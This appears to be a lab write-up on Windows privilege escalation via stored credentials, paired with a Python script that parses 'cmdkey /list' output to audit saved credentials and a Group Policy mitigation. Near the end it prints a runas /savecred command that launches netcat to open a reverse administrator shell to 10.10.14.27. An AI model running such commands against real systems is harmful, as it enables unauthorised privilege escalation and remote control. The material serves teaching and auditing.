Stored Credentials

Stored credentials on a system allow a user to run commands as the account those credentials belong to. If an administrator has saved credentials, think of it as sudo for Windows.

Check for stored credentials with cmdkey /list:

C:\Users\security>cmdkey /list

Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
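As an added example (not part of the original write-up), the script below parses saved cmdkey /list output and flags the entries that matter for this check: "Domain:interactive=" entries of type "Domain Password" are the ones runas /savecred can consume, and an entry for an administrative account is the quick win the post describes. The sample output is constructed (the first entry mirrors the one above), and the privileged-name list is a hypothetical starting point to tune per environment. It is useful for auditing host output in bulk from a defender's side as much as for an enumeration checklist.

```python
"""Parse `cmdkey /list` output and flag saved interactive credentials."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample of cmdkey /list output (not captured from a real host).
# The first entry mirrors the one shown in the write-up; the other two are
# made up to show entries the check should NOT flag.
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: developer
    Local machine persistence

    Target: Domain:target=fileserver.example.local
    Type: Domain Password
    User: EXAMPLE\\backupsvc
    Saved for this logon only
"""

# Hypothetical list of account names treated as high value; tune per environment.
PRIVILEGED_NAMES = {"administrator", "admin"}

KV_LINE = re.compile(r"^\s*(Target|Type|User):\s*(.+?)\s*$")


@dataclass
class StoredCredential:
    target: str
    cred_type: str
    user: str
    flags: list[str] = field(default_factory=list)  # e.g. "Local machine persistence"

    @property
    def runas_usable(self) -> bool:
        # runas /savecred consumes "Domain:interactive=" entries of type Domain Password;
        # generic (application) credentials and per-server entries do not qualify.
        return self.cred_type == "Domain Password" and self.target.startswith("Domain:interactive=")

    @property
    def account_name(self) -> str:
        # Strip the DOMAIN\ prefix if present.
        return self.user.rsplit("\\", 1)[-1]

    @property
    def privileged(self) -> bool:
        return self.account_name.lower() in PRIVILEGED_NAMES


def parse_cmdkey_list(text: str) -> list[StoredCredential]:
    """Split cmdkey /list output into one record per stored credential."""
    creds: list[StoredCredential] = []
    current: dict[str, str] = {}
    flags: list[str] = []

    def flush() -> None:
        if "Target" in current:
            creds.append(StoredCredential(current["Target"], current.get("Type", ""),
                                          current.get("User", ""), list(flags)))
        current.clear()
        flags.clear()

    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            flush()          # entries are separated by blank lines
            continue
        m = KV_LINE.match(line)
        if m:
            key, value = m.groups()
            if key == "Target" and "Target" in current:
                flush()      # defensive: new entry without a blank separator
            current[key] = value
        elif stripped.endswith(":"):
            continue         # header line "Currently stored credentials:"
        elif current:
            flags.append(stripped)  # trailing attribute lines belong to the current entry
    flush()
    return creds


def audit(creds: list[StoredCredential]) -> list[tuple[str, str, str]]:
    """Return (severity, user, target) for every credential runas /savecred could use."""
    findings = []
    for c in creds:
        if c.runas_usable:
            severity = "HIGH" if c.privileged else "MEDIUM"
            findings.append((severity, c.user, c.target))
    return findings


if __name__ == "__main__":
    for sev, user, target in audit(parse_cmdkey_list(SAMPLE_CMDKEY_OUTPUT)):
        print(f"[{sev}] saved interactive credential for {user} ({target})")
```

On a real host you would feed it the actual output (for example `subprocess.run(["cmdkey", "/list"], capture_output=True, text=True).stdout`). On the mitigation side, the Group Policy setting "Network access: Do not allow storage of passwords and credentials for network authentication" (the DisableDomainCreds value under the Lsa key) stops domain credentials from being saved in Credential Manager in the first place, which is the usual fix once an audit turns up entries like the one above.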

To run commands using the stored credentials, Windows ships a program called "runas.exe" in System32. It is always best to call these executables by their full path so that we execute the intended file rather than a different binary picked up through an environment variable such as PATH.

Example running Netcat as Administrator:

C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "nc.exe 10.10.14.27 4444 -e cmd.exe"
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
access\administrator

Conclusion

cmdkey /list is an excellent check to add to your post-exploitation enumeration checklist. It is the Windows equivalent of running sudo -l to hunt for a quick win.